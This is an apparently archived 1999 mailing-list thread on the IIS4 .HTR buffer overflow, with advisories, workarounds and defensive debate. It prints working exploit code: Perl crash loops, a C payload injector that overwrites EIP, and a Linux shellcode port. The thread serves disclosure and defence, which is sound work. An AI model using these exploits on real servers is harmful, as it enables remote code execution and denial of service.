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packetstormEEye Digital SecurityPACKETSTORM:11771
HistoryAug 17, 1999 - 12:00 a.m.


eEye Digital Security
`Retina vs. IIS4, Round 2, KO  
eEye - Digital Security Team ([email protected])  
Tue, 15 Jun 1999 12:18:16 -0000   
Retina vs. IIS4, Round 2  
Systems Affected:  
Internet Information Server 4.0 (IIS4)  
Microsoft Windows NT 4.0 SP3 Option Pack 4  
Microsoft Windows NT 4.0 SP4 Option Pack 4  
Microsoft Windows NT 4.0 SP5 Option Pack 4  
Release Date:  
June 8, 1999  
Advisory Code:  
We have been debating how to start out this advisory. How do you explain  
that 90% or so of the Windows NT web servers on the Internet are open to a  
hole that lets an attacker execute arbitrary code on the remote web server?  
So the story starts...  
The Goal:  
Find a buffer overflow that will affect 90% of the Windows NT web servers on  
the Internet. Exploit this buffer overflow.  
The Theory:  
There will be overflows in at least one of the default IIS filtered  
extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit will take  
place is that IIS will pass the full URL to the DLL that handles the  
extension. Therefore if the ISAPI DLL does not do proper bounds checking it  
will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to  
execute arbitrary code on the remote server.  
Entrance Retina:  
At the same time of working on this advisory we have been working on the AI  
mining logic for Retina's HTTP module. What better test scenario than this?  
We gave Retina a list of 10 or so extensions common to IIS and instructed it  
to find any possible holes relating to these extensions.  
The Grind:  
After about an hour Retina found what appeared to be a hole. It displayed  
that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server.  
We all crossed our fingers, started up the good ol' debugger and had Retina  
hit the server again.  
Note: [overflow] is 3k or so characters... but we will not get into the  
string lengths and such here. View the debug info and have a look for  
The Registers:  
EAX = 00F7FCC8 EBX = 00F41130  
ECX = 41414141 EDX = 77F9485A  
ESI = 00F7FCC0 EDI = 00F7FCC0  
EIP = 41414141 ESP = 00F4106C  
EBP = 00F4108C EFL = 00000246  
Note: Retina was using "A" (0x41 in hex) for the character to overflow with.  
If you're not familiar with buffer overflows a quick note would be that  
getting our bytes into any of the registers is a good sign, and directly  
into EIP makes it even easier :)  
Explain This:  
The overflow is in relation to the .HTR extensions. IIS includes the  
capability to allow Windows NT users to change their password via the web  
directory /iisadmpwd/. This feature is implemented as a set of .HTR files  
and the ISAPI extension file ISM.DLL. So somewhere along the line when the  
URL is passed through to ISM.DLL, proper bounds checking is not done and our  
overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default  
on IIS4 servers. Looks like we got our 90% of the Windows NT web servers  
part down. However, can we exploit this?  
The Exploit:  
Yes. We can definitely exploit this and we have. We will not go into much  
detail here about how the buffer is exploited and such. Read the comments in  
the asm file for more information. However, one nice thing to note is that  
the exploit has been crafted in such a way to work on SP4 and SP5 machines,  
therefore there is no guessing of offsets and possible accidental crashing  
of the remote server. We have not tested the exploit on SP3 and would love  
to know if it works or not. eMail [email protected] if you've successfully  
exploited this hole on SP3.  
For more details about the exploit visit the eEye web site at  
The Fallout:  
Almost 90% of the Windows NT web servers on the Internet are affected by  
this hole. Everyone from NASDAQ to the U.S. Army to Microsoft themselves.  
No, we did not try it on the above mentioned. But it is easy to verify if a  
web server is exploitable without using the exploit. Even a server that's  
locked in a guarded room behind a Cisco Pix can be broken into with this  
hole. This is a reminder to all software vendors that testing for common  
security holes in your software is a must. Demand more from your software  
The Request. (Well one anyway.)  
Dear Microsoft,  
One of the things that we found out is that IIS did not log any trace of our  
attempted hack. We recommend that you pass all server requests to the  
logging service before passing it to any ISAPI filters etc...The logging  
service should be, as named, an actual service running in a separate memory  
space so that when inetinfo goes down intrusion signatures are still logged.  
Retina vs. IIS4, Round 2. KO.  
1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has just  
updated their checklist to include this interim fix.  
2. Apply the patch supplied by Microsoft when available.  
Vendor Status:  
We contacted Microsoft on June 8th 1999, eEye Digital Security Team provided  
all information needed to reproduce the exploit. and how to fix it.  
Microsoft security team did confirm the exploit and are releasing a patch  
for IIS.  
Related Links  
Advisory - On our web site  
Advisory - Retina Brain File used to uncover the hole  
Retina - The Network Security Scanner  
Greetings go out to:  
The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN  
and any other security company or organization that believes in full  
Copyright (c) 1999 eEye Digital Security Team  
Permission is hereby granted for the redistribution of this alert  
electronically. It is not to be edited in any way without express consent of  
eEye. If you wish to reprint the whole or any part of this alert in any  
other medium excluding electronic medium, please e-mail [email protected] for  
The information within this paper may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There are  
NO warranties with regard to this information. In no event shall the author  
be liable for any damages whatsoever arising out of or in connection with  
the use or spread of this information. Any use of this information is at the  
user's own risk.  
Please send suggestions, updates, and comments to:  
eEye Digital Security Team  
[email protected]  
Date: Tue, 15 Jun 1999 18:23:28 -0000  
From: eEye - Digital Security Team <[email protected]>  
Subject: Update to IIS Remote Hole.  
We have updated our advisory on our website,  
and as promised added a link to the working remote exploit,  
eEye Digital Security Team  
Re: Retina vs. IIS4, Round 2, KO  
Ryan R Permeh ([email protected])  
Tue, 15 Jun 1999 17:01:23 -0500   
tested, this works for me... scripting was turned on... perl exploit  
code follows:  
#props to the absu crew  
use Net::Telnet;  
for ($i=2500;$i<3500;$i++)  
$obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);  
my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";  
print "$cmd\n";$obj->print("$cmd");  
Ryan R Permeh E-MAIL: [email protected]   
IS Engineer WEB :  
Rural Connections HELP : [email protected]  
FAQ :   
SALES : [email protected]  
120 First Street NE PHONE : (507) 281-5005   
Rochester, MN 55906 FAX : (507) 281-9272   
Re: Retina vs. IIS4, Round 2, KO  
Randal L. Schwartz ([email protected])  
Tue, 15 Jun 1999 16:59:08 -0700   
>>>>> "Ryan" == Ryan R Permeh <[email protected]> writes:  
Ryan> #!/usr/bin/perl  
Ryan> #props to the absu crew  
Ryan> use Net::Telnet;  
Ryan> for ($i=2500;$i<3500;$i++)  
Ryan> {  
Ryan> $obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);  
Ryan> my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";  
Ryan> print "$cmd\n";$obj->print("$cmd");  
Ryan> $obj->close;  
Ryan> }  
It's silly to use Net::Telnet for HTTP:  
use LWP::Simple;  
for ($i = 2500; $i <= 3500; $i++) {  
warn "$i\n";  
get "http://$ARGV[0]/".('a' x $i).".htr";  
Name: Randal L. Schwartz / Stonehenge Consulting Services (503)777-0095  
Keywords: Perl training, UNIX[tm] consulting, video production, skiing, flying  
Email: <[email protected]> Snail: (Call) PGP-Key: (finger [email protected])  
Web: <A HREF="">My Home Page!</A>  
Quote: "I'm telling you, if I could have five lines in my .sig, I would!" -- me  
Microsoft Security Bulletin (MS99-019)  
Patch Available for Malformed HTR Request Vulnerability  
Originally Posted: May 27, 1999  
Microsoft has released a patch that eliminates a vulnerability in Microsoft  
(r) Internet Information Server 4.0. The vulnerability could allow denial  
of service attacks against an IIS server or, under certain conditions,  
could allow arbitrary code to be run on the server.  
Microsoft has issued this bulletin to advise customers of steps they can  
take to protect themselves against this vulnerability. A patch to eliminate  
this vulnerability is being developed, and an update to this bulletin will  
be released to advise customers when it is available.  
IIS supports several file types that require server-side processing. When a  
web site visitor requests a file of one of these types, an appropriate  
filter DLL processes it. A vulnerability exists in ISM.DLL, the filter DLL  
that processes .HTR files. HTR files enable remote administration of user  
The vulnerability involves an unchecked buffer in ISM.DLL. This poses two  
threats to safe operation. The first is a denial of service threat. A  
malformed request for an .HTR file could overflow the buffer, causing IIS  
to crash. The server would not need to be rebooted, but IIS would need to  
be restarted. The second threat would be more difficult to exploit. A  
carefully-constructed file request could cause arbitrary code to execute on  
the server via a classic buffer overrun technique. Neither scenario could  
occur accidentally. This vulnerability does not involve the functionality  
of the password administration features of .HTR files.  
While there are no reports of customers being adversely affected by this  
vulnerability, Microsoft is proactively releasing this bulletin to allow  
customers to take appropriate action to protect themselves against it.  
Affected Software Versions  
- Microsoft Internet Information Server 4.0  
What Microsoft is Doing  
Microsoft has provided a workaround that fixes the problem identified.  
The workaround is discussed below in What Customers Should Do.  
Microsoft also has sent this security bulletin to customers  
subscribing to the Microsoft Product Security Notification Service.  
See for more  
information about this free customer service.  
What Customers Should Do  
Microsoft highly recommends that customers disable the script mapping  
for .HTR files as follows:  
- From the desktop, start the Internet Service Manager  
by clicking Start | Programs | Windows NT 4.0 Option  
Pack | Microsoft Internet Information Server | Internet  
Service Manager  
- Double-click "Internet Information Server"  
- Right-click on the computer name and select Properties  
- In the Master Properties drop-down box, select "WWW Service",  
then click the "Edit" button .  
- Click the "Home Directory" tab, then click the "Configuration"  
- Highlight the line in the extension mappings that contains ".HTR",  
then click the "Remove" button.  
- Respond "yes" to "Remove selected script mapping?" say yes,  
click OK 3 times, close ISM  
A patch will be available shortly to eliminate the vulnerability  
Customers should monitor for an  
announcement when the patches are available.  
Microsoft recommends that customers review the IIS Security Checklist  
More Information  
Please see the following references for more information related to this  
- Microsoft Security Bulletin MS99-019,  
Workaround Available for "Malformed HTR Request" Vulnerability  
(The Web-posted version of this bulletin),  
- IIS Security Checklist,  
Obtaining Support on this Issue  
If you require technical assistance with this issue, please contact  
Microsoft Technical Support. For information on contacting Microsoft  
Technical Support, please see  
- June 15, 1999: Bulletin Created.  
For additional security-related information about Microsoft products,  
please visit  
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.  
Date: Wed, 16 Jun 1999 12:12:33 -0400  
From: Russ <[email protected]>  
To: [email protected]  
Subject: Re: Update to IIS Remote Hole.  
Nelson Bunker <[email protected]> has provided us with an VB app  
which automates the process of updating your IIS 4.0 Metabase to remove  
the ISM.DLL mappings which permit the eEye IISHack to work. Its a  
temporary workaround while Microsoft continue to work on a proper fix  
(which is expected today or tomorrow btw). For those of you with large  
IIS installation, you might find this extremely useful.  
If you use it, make sure you drop Nelson a line and thank him for it!  
Check the NTBugtraq Home Page,, in the  
"What's New" section for links.  
Russ - NTBugtraq Editor  
For those of you that have too many IIS machines to yank this off by hand here is some vb code to set your IIS metabase remotely... VB 5.0 sp3 IIS Resource kit installed --  
Metabase editor utility from resource kit needs to be installed.  
Have fun! You can set all of you metabase up with the tools mentioned above. :-)  
Nelson Bunker  
'The subs I put in Modules handles the App Mappings tab of the  
'application configuration screen  
Sub AppMappings(ByRef IIS)  
'delete all existing script paths  
Call DeleteAllLowerProperties(IIS, "ScriptMaps")  
'the only thing changed on scripts maps is htm & html mapped to  
'asp.dll and removed the ism.dll mapping  
newscriptmaps =  
IIS.PutEx 2, "ScriptMaps", newscriptmaps  
End Sub  
Sub DeleteAllLowerProperties(ByRef IIS, ByVal PropertyName)  
'delete all existing script paths  
PathList = IIS.GetDataPaths(PropertyName, 1)  
If Err.Number <> 0 Then  
For Each Path In PathList  
Set objScriptPath = GetObject(Path)  
objScriptPath.PutEx 1, PropertyName, True  
End If  
End Sub  
' Start form1 here  
Function GetServerArray()  
GetServerArray = Array("Websvr1", ...., "WebsvrX")  
End Function  
Private Sub Form_Load()  
ServerArray = GetServerArray()  
For Each Server In ServerArray  
Set globalW3svc = GetObject("IIS://" & Server & "/W3SVC")  
Call AppMappings(globalW3svc)  
End Sub  
Date: Wed, 16 Jun 1999 08:58:05 -0700  
From: Greg Hoglund <[email protected]>  
To: [email protected]  
Subject: IIS Remote Exploit (injection code)  
I read yesturday on that they had discovered a buffer overflow in  
IIS. I could not resist writing an exploit. I did not have time to design  
a really cool payload for this exploit, so I simply wrote the injection  
code. However, this is meaningful for several reasons. Attached is the  
injection code. The exploit will deliver any payload of your choosing.  
Your payload will be executed. This empowers you to create a "collection"  
of payloads that are not dependant upon the injection vector in any way.  
This decoupling is important for military needs, where a single injection  
vector needs to work, but the "warhead" may be different depending on the  
targets characterization.  
The exploit was fairly simple to build. In short, I read on that  
they had overflowed IIS with something like a ~3000 character URL. Within  
minutes I had caused IIS to crash with EIP under my control. I used a  
special pattern in the buffer (see code) to make it easy for me to identify  
where EIP was being popped from. The pattern also made it easy to  
determine where I was jumping around. Use the tekneek Danielson. ;-)  
So, I controlled EIP, but I needed to get back to my stack segment, of  
course. This is old school, and I really lucked out. Pushed down two  
levels on the stack was an address for my buffer. I couldn't have asked  
for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could  
return to. It had two pop's followed by a return. This made my injection  
vector return to the value that was stored two layers down on the stack.  
Bam, I was in my buffer. So, I landed in a weird place, had to add a near  
jump to get to somewhere more useful.. nothing special, and here we are  
with about 2K of payload space. If you don't supply any mobile code to be  
run, the injection vector will supply some for you. The default payload in  
simply a couple of no-ops followed by a debug breakpoint (interrupt 3)...  
It's easy to play with if you want to build your own payloads.. just keep a  
debugger attached to inetinfo.exe on the target machine.  
Lastly, I would simply like to point out that monoculture installations are  
very dangerous. It's a concept from agribusiness.. if you have all one  
crop, and a virus comes along that can kill that crop, your out of  
business. With almost ALL of the IIS servers on the net being vulnerable  
to this exploit, we also have a monoculture. And, it's not just IIS. The  
backbone of the Internet is built on common router technology (such as  
cisco IOS). If a serious exploit comes along for the IOS kernel, can you  
imagine the darkness that will fall?  
<--- snip  
// IIS Injector for NT  
// written by Greg Hoglund <[email protected]>  
// If you would like to deliver a payload, it must be stored in a binary file.  
// This injector decouples the payload from the injection code allowing you to  
// create a numnber of different attack payloads. This code could be used, for  
// example, by a military that needs to attack IIS servers, and has characterized  
// the eligible hosts. The proper attack can be chosen depending on needs. Since  
// the payload is so large with this injection vector, many options are available.  
// First and foremost, virii can delivered with ease. The payload is also plenty  
// large enough to remotely download and install a back door program.  
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a  
// very serious security problem.  
#include <windows.h>  
#include <stdio.h>  
#include <winsock.h>  
void main(int argc, char **argv)  
SOCKET s = 0;  
WSADATA wsaData;  
if(argc < 2)  
fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \  
"\nUsage: %s <target" \  
"ip> <optional payload file>\n", argv[0]);  
WSAStartup(MAKEWORD(2,0), &wsaData);  
anAddr.sin_family = AF_INET;  
anAddr.sin_port = htons(80);  
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);  
if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))  
static char theSploit[4096];  
// fill pattern  
char kick = 'z'; //0x7a  
char place = 'A';  
// my uber sweet pattern gener@t0r  
for(int i=0;i<4096;i+=4)  
theSploit[i] = kick;  
theSploit[i+1] = place;  
theSploit[i+2] = place + 1;  
theSploit[i+3] = place + 2;  
if(++place == 'Y') // beyond 'XYZ'  
place = 'A';  
if(--kick < 'a') kick = 'a';  
_snprintf(theSploit, 5, "get /");  
_snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");  
// after crash, looks like inetinfo.exe is jumping to the address  
// stored @ location 'GHtG' (0x47744847)  
// cross reference back to the buffer pattern, looks like we need  
// to store our EIP into theSploit[598]  
// magic eip into NTDLL.DLL  
theSploit[598] = (char)0xF0;  
theSploit[599] = (char)0x8C;  
theSploit[600] = (char)0xF8;  
theSploit[601] = (char)0x77;  
// code I want to execute  
// will jump foward over the  
// embedded eip, taking us  
// directly to the payload  
theSploit[594] = (char)0x90; //nop  
theSploit[595] = (char)0xEB; //jmp  
theSploit[596] = (char)0x35; //  
theSploit[597] = (char)0x90; //nop  
// the payload. This code is executed remotely.  
// if no payload is supplied on stdin, then this default  
// payload is used. int 3 is the debug interrupt and  
// will cause your debugger to "breakpoint" gracefully.  
// upon examiniation you will find that you are sitting  
// directly in this code-payload.  
if(argc < 3)  
theSploit[650] = (char) 0x90; //nop  
theSploit[651] = (char) 0x90; //nop  
theSploit[652] = (char) 0x90; //nop  
theSploit[653] = (char) 0x90; //nop  
theSploit[654] = (char) 0xCC; //int 3  
theSploit[655] = (char) 0xCC; //int 3  
theSploit[656] = (char) 0xCC; //int 3  
theSploit[657] = (char) 0xCC; //int 3  
theSploit[658] = (char) 0x90; //nop  
theSploit[659] = (char) 0x90; //nop  
theSploit[660] = (char) 0x90; //nop  
theSploit[661] = (char) 0x90; //nop  
// send the user-supplied payload from  
// a file. Yes, that's a 2K buffer for  
// mobile code. Yes, that's big.  
FILE *in_file;  
in_file = fopen(argv[2], "rb");  
int offset = 650;  
while( (!feof(in_file)) && (offset < 3000))  
theSploit[offset++] = fgetc(in_file);  
send(s, theSploit, strlen(theSploit), 0);  
Date: Wed, 16 Jun 1999 10:59:38 -0000  
From: Marc <[email protected]>  
To: [email protected]  
Subject: Update to IIS hole.  
We have been receiving some eMails from people saying that the iishack.exe  
on our website is not working for them and is just crashing the remote  
server. Here is what we know and do not know etc..  
We have tested it on the English version of NT4.0, with IIS4.0, Service Pack  
4 and 5.  
We have had some people eMail us that they have this configuration and it is  
not working... This very well could be possible that the offset we are using  
is not working for some dll's and such... people might have a different  
version and what not. For this case we *might* release a second exploit that  
uses a better offset that should work on all nt4.0 iis4.0 sp4 and sp5  
machines but honestly it is not that big of a deal to us. The hole is there,  
and is exploitable and other people have been writing exploits for it also.  
We do know that our exploit probably does not work on sp3 because off the  
offset we use... we have gotten a few eMails about this and we never did  
test nor claim it worked on sp3 but we *might* in our second version of the  
exploit find a offset that works for sp3 also.  
I honestly think this post is in some ways pointless but maybe it will help  
to cut back some of the eMails we are getting about the above information.  
Thank you to everyone who has been helping out.  
eEye Digital Security Team  
Jump on over to for some good information and other  
exploits and such.  
Date: Wed, 16 Jun 1999 19:04:20 +0200 (CEST)  
From: typo <[email protected]>  
To: [email protected]  
Cc: [email protected]  
Subject: iis4 remote exploit ported  
the teso crew has ported the iis exploit to linux...  
basically this program does the same as the windows version (written in  
asm) of this exploit. Produced shellcode is identical.. everything should  
work.. we haven't tested. Everyone except is allowed to put  
a copy of this on his/her/their webpage.  
visit #austria on ircnet for newest elite 0day exploits.  
scut & typo  
/* iis 4.0 exploit  
* by eeye security  
* ported to unix/C by the teso crew.  
* shoutouts to #hax and everyone else knowing us...  
* you know who you are.  
* gcc -o tesoiis tesoiis.c -Wall  
#include <sys/types.h>  
#include <sys/ioctl.h>  
#include <sys/socket.h>  
#include <sys/time.h>  
#include <arpa/inet.h>  
#include <netdb.h>  
#include <net/if.h>  
#include <netinet/in.h>  
#include <errno.h>  
#include <fcntl.h>  
#include <stdarg.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <unistd.h>  
int net_connect (struct sockaddr_in *cs, char *server,  
unsigned short int port, char *sourceip,  
unsigned short int sourceport, int sec);  
void net_write (int fd, const char *str, ...);  
unsigned long int net_resolve (char *host);  
char stuff[] = "\x42\x68\x66\x75\x41\x50"; /* "!GET /" */  
#define URL_OFFSET 1055  
char front[] = "GET /AAAAAAA"  
/* stick it in here */  
".htr HTTP/1.0";  
usage (void)  
printf ("usage: ./tesoiis host port url\n");  
exit (EXIT_FAILURE);  
main (int argc, char *argv[])  
/* yadda,yadda.. you can try exploiting our exploit!!  
* update: hmm.. is this exploitable? gets EIP touched by exit()?  
* gotta check this later...  
char host[256], url[256];  
int port,sd,t = 0;  
int m = 0;  
char *cc, *pfft;  
struct sockaddr_in cs;  
printf ("teso crew IIS exploit.. shellcode by eEye.\n");  
printf ("------------------------------------------\n");  
if (argc < 4)  
strcpy (host, argv[1]);  
strcpy (url, argv[3]);  
port = atoi (argv[2]);  
if ((port < 1) || (port > 65535))  
cc = url;  
pfft = front + URL_OFFSET;  
while (*cc) {  
if (*cc == '/' && 0 == t) {  
memcpy (pfft, stuff, 6);  
pfft += 6;  
t = 1;  
} else {  
*pfft = *cc + 0x21;  
m += 1;  
printf ("Host: %s Port: %d Url: %s\n", host, port, url);  
printf ("Connecting... ");  
fflush (stdout);  
sd = net_connect (&cs, host, port, NULL, 0, 30);   
if (sd < 1) {  
printf ("failed!\n");  
exit (EXIT_FAILURE);  
printf ("done.. sending shellcode..");  
fflush (stdout);  
net_write (sd, "%s\n\n", front);  
printf ("done.. closing fd!\n");  
close (sd);  
printf ("%s\n", front);  
exit (EXIT_SUCCESS);  
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,  
unsigned short int sourceport, int sec)  
int n, len, error, flags;  
int fd;  
struct timeval tv;  
fd_set rset, wset;  
/* first allocate a socket */  
cs->sin_family = AF_INET;  
cs->sin_port = htons (port);  
fd = socket (cs->sin_family, SOCK_STREAM, 0);  
if (fd == -1)  
return (-1);  
if (!(cs->sin_addr.s_addr = net_resolve (server))) {  
close (fd);  
return (-1);  
flags = fcntl (fd, F_GETFL, 0);  
if (flags == -1) {  
close (fd);  
return (-1);  
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);  
if (n == -1) {  
close (fd);  
return (-1);  
error = 0;  
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));  
if (n < 0) {  
if (errno != EINPROGRESS) {  
close (fd);  
return (-1);  
if (n == 0)  
goto done;  
FD_SET(fd, &rset);  
FD_SET(fd, &wset);  
tv.tv_sec = sec;  
tv.tv_usec = 0;  
n = select(fd + 1, &rset, &wset, NULL, &tv);  
if (n == 0) {  
errno = ETIMEDOUT;  
return (-1);  
if (n == -1)  
return (-1);  
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {  
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {  
len = sizeof(error);  
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {  
errno = ETIMEDOUT;  
return (-1);  
if (error == 0) {  
goto done;  
} else {  
errno = error;  
return (-1);  
} else  
return (-1);  
n = fcntl(fd, F_SETFL, flags);  
if (n == -1)  
return (-1);  
return (fd);  
unsigned long int  
net_resolve (char *host)  
long i;  
struct hostent *he;  
i = inet_addr(host);  
if (i == -1) {  
he = gethostbyname(host);  
if (he == NULL) {  
return (0);  
} else {  
return (*(unsigned long *) he->h_addr);  
return (i);  
net_write (int fd, const char *str, ...)  
char tmp[8192];  
va_list vl;  
int i;  
va_start(vl, str);  
memset(tmp, 0, sizeof(tmp));  
i = vsnprintf(tmp, sizeof(tmp), str, vl);  
send(fd, tmp, i, 0);  
Date: Wed, 16 Jun 1999 19:09:42 GMT  
From: Ethan Benatan <[email protected]>  
To: [email protected]  
Subject: Re: IIS Remote Exploit (injection code)  
>>> "Greg" == Greg Hoglund <[email protected]> writes:  
Greg> I read yesturday on that they had discovered a buffer  
Greg> overflow in IIS.....  
Greg> Lastly, I would simply like to point out that monoculture  
Greg> installations are very dangerous. It's a concept from  
Greg> agribusiness.. if you have all one crop, and a virus comes  
Greg> along that can kill that crop, your out of business.  
Very true, and this is a terrifically important message to get out.  
Not to be pedantic but actually it is a concept from ecology: the  
"business", as Greg puts it, can be any system. Diversity makes for  
resilience, and vice versa. Okay aleph, it's not a bug but it is a  
way we should be thinking.  
Greg> With  
Greg> almost ALL of the IIS servers on the net being vulnerable to  
Greg> this exploit, we also have a monoculture. And, it's not just  
Greg> IIS. The backbone of the Internet is built on common router  
Greg> technology (such as cisco IOS). If a serious exploit comes  
Greg> along for the IOS kernel, can you imagine the darkness that  
Greg> will fall?  
[email protected]  
Date: Wed, 16 Jun 1999 16:40:25 -0400  
From: Dug Song <[email protected]>  
To: [email protected]  
Subject: Re: IIS Remote Exploit (injection code)  
On Wed, 16 Jun 1999, Ethan Benatan wrote:  
> Very true, and this is a terrifically important message to get out...  
> Diversity makes for resilience, and vice versa.  
see stephanie forrest's work on computer immunology:  
and to a lesser extent, random "canary" values in StackGuard:  
and the introduction of randomness to defeat race attacks, predictable  
sequence number attacks, etc. in OpenBSD:  
Date: Wed, 16 Jun 1999 15:03:52 -0700  
From: Crispin Cowan <[email protected]>  
To: [email protected]  
Subject: Diversity (was: IIS Remote Exploit (injection code))  
Dug Song wrote:  
> On Wed, 16 Jun 1999, Ethan Benatan wrote:  
> > Very true, and this is a terrifically important message to get out...  
> > Diversity makes for resilience, and vice versa.  
> see stephanie forrest's work on computer immunology:  
> and to a lesser extent, random "canary" values in StackGuard:  
StackGuard came about because we investigated the approach of using  
diversity to resist attack, and found it to be VERY limited in  
effectiveness. The core problem is that when you change things, you  
create incompatabilities for friend and foe alike, i.e. a diversity hack  
strong enough to defeat an attacker is also likely to break a lot of  
YOUR applications. This occurs because:  
* The diversity hack must preserve many invariants that are necessary  
to keep legitimate applications running, and these invariants are  
often subtle and unknown, e.g. Linux applications that only work on  
Red Hat systems.  
* Simultaneously, the diversity hack must BREAK the invariants that the  
attacker depends on, and these invariants are mostly unknown. If you  
knew what they were, you would have fixed the bug :-)  
Having discovered that diversity is hard to make both effective and  
practical, we moved on to study what we call "restrictions." A  
restriction prohibits certain classes of behavior that are always known to  
be bad, e.g. changing the return address of an active function, which is  
what stack smashes try to do, and what StackGuard prevents.  
It is our conjecture that for every diversity hack that one can propose,  
there is a restriction hack that is easier to deploy and more effective.  
This has been true in practice as we try to construct security-enhancing  
Full papers on these ideas can be found here:  
Crispin Cowan, Research Assistant Professor of Computer Science, OGI  
NEW: Protect Your Linux Host with StackGuard'd Programs :FREE  
Microsoft: Putting the "lame" in "layman"  
Date: Wed, 16 Jun 1999 16:30:12 -0400  
From: CERT Advisory <[email protected]>  
Reply-To: [email protected]  
To: [email protected]  
Subject: CERT Advisory CA-99.07 - IIS Buffer Overflow  
CERT Advisory CA-99-07 IIS Buffer Overflow  
Originally released: June 16, 1999  
Source: CERT/CC  
Systems Affected  
* Machines running Microsoft Internet Information Server 4.0.  
I. Description  
A buffer overflow vulnerability affecting Microsoft Internet  
Information Server 4.0 has been discovered in the ISM.DLL library.  
According to Microsoft, ISM.DLL is the "filter DLL that processes .HTR  
files. HTR files enable remote administration of user passwords."  
A tool to exploit this vulnerability has been publicly released.  
II. Impact  
This vulnerability allows remote intruders to execute arbitrary code  
with the privileges of the IIS server. Additionally, intruders can use  
this vulnerability to crash vulnerable IIS processes.  
III. Solution  
Microsoft has released Microsoft Security Bulletin MS99-019 describing  
a workaround to this problem. Additionally, Microsoft is working on a  
patch to fix this problem; information regarding this patch will be  
available in the Microsoft Security Bulletin. We encourage you to read  
this bulletin, available from  
We will update this advisory as more information becomes available.  
Please check the CERT/CC web site for the most current revision.  
This document is available from:  
CERT/CC Contact Information  
Email: [email protected]  
Phone: +1 412-268-7090 (24-hour hotline)  
Fax: +1 412-268-6989  
Postal address:  
CERT Coordination Center  
Software Engineering Institute  
Carnegie Mellon University  
Pittsburgh PA 15213-3890  
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)  
Monday through Friday; they are on call for emergencies during other  
hours, on U.S. holidays, and on weekends.  
Using encryption  
We strongly urge you to encrypt sensitive information sent by email.  
Our public PGP key is available from  
If you prefer to use DES, please call the CERT hotline for more  
Getting security information  
CERT publications and other security information are available from  
our web site  
To be added to our mailing list for advisories and bulletins, send  
email to [email protected] and include SUBSCRIBE  
your-email-address in the subject of your message.  
Copyright 1999 Carnegie Mellon University.  
Conditions for use, disclaimers, and sponsorship information can be  
found in  
* "CERT" and "CERT Coordination Center" are registered in the U.S.  
Patent and Trademark Office  
Any material furnished by Carnegie Mellon University and the Software  
Engineering Institute is furnished on an "as is" basis. Carnegie  
Mellon University makes no warranties of any kind, either expressed or  
implied as to any matter including, but not limited to, warranty of  
fitness for a particular purpose or merchantability, exclusivity or  
results obtained from use of the material. Carnegie Mellon University  
does not make any warranty of any kind with respect to freedom from  
patent, trademark, or copyright infringement.  
Revision History  
June 16, 1999: Initial release  
Version: 2.6.2  
Date: Mon, 21 Jun 1999 12:23:27 +0300  
From: Mikko Hypponen <[email protected]>  
To: [email protected]  
Subject: Re: Alert: Microsoft Security Bulletin (MS99-019) - IIS Fix Available  
>Microsoft have released a patch for IIS 4.0 which addresses the issues  
>uncovered by eEye.  
Also, if you want to monitor who's running IISHACK in your organisation,  
we've added detection of this tool (as a trojan horse) into latest updates  
for F-Secure Anti-Virus. This detects the original IISHACK.EXE as released  
by eEye with the name "Trojan.IIS_Hack".  
For more information, see our Virus News Updates at:  
Mikko Hermanni HyppΓΆnen, [email protected]  
Manager, Anti-Virus Research, Data Fellows Corp.  
Integrated Solutions for Enterprise Security  
Tel +358 9 8599 0513 - fax +358 9 8599 0713  